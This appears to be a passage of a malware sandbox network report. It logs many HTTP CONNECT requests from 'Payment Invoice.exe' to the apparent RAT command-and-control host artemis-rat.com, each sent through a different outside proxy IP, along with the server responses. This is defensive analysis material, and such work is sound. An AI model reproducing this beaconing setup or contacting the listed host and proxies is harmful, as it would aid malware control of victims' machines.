                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                999192.168.2.452983172.67.35.15807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.804332972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.964778900 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1000192.168.2.45242743.243.141.1982287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.804442883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1001192.168.2.45245351.161.131.84258437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.804717064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.589221954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.557573080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.249106884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.777025938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.264686108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.792582989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.624491930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1002192.168.2.452936211.222.252.18781977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.804795027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1003192.168.2.45298874.48.7.43807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.804877996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1004192.168.2.452938122.116.150.290007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.804909945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1005192.168.2.452942218.252.244.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.806140900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1006192.168.2.453027172.67.182.153807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.806385994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.965090990 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1007192.168.2.452998162.159.242.62807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.807095051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.968413115 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1008192.168.2.45295672.206.181.105649357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.812293053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1009192.168.2.45291689.218.8.15210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.813395023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1010192.168.2.452851143.64.8.2180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.817264080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1011192.168.2.452987199.229.254.12941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.855711937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1012192.168.2.452982162.223.94.164807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.855783939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.147769928 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1013192.168.2.4530003.90.100.1231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.855928898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.072637081 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1014192.168.2.452966213.17.246.4631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.856270075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.169290066 CET696INHTTP/1.1 403 Forbidden
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 548
                                                                Connection: keep-alive
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1015192.168.2.452952170.84.205.1741537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.856426954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1016192.168.2.452487197.242.146.10931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.858063936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.542764902 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1017192.168.2.452930212.220.13.9841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.861054897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1018192.168.2.45311941.86.252.914437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.878304958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1019192.168.2.45295889.250.152.7680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.880251884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.246936083 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1020192.168.2.45316541.86.252.914437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.887552977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1021192.168.2.45316741.86.252.914437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.889210939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1022192.168.2.452985221.153.92.39807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.907418013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1023192.168.2.45298661.92.189.15807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.908433914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1024192.168.2.45316841.86.252.914437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.909934998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1025192.168.2.453001130.162.213.17531297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.918009996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.312494993 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1026192.168.2.4529603.108.115.4810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.922223091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.324148893 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1027192.168.2.45299761.110.5.2807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.930026054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.714371920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.658694029 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1028192.168.2.45303347.242.15.120156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
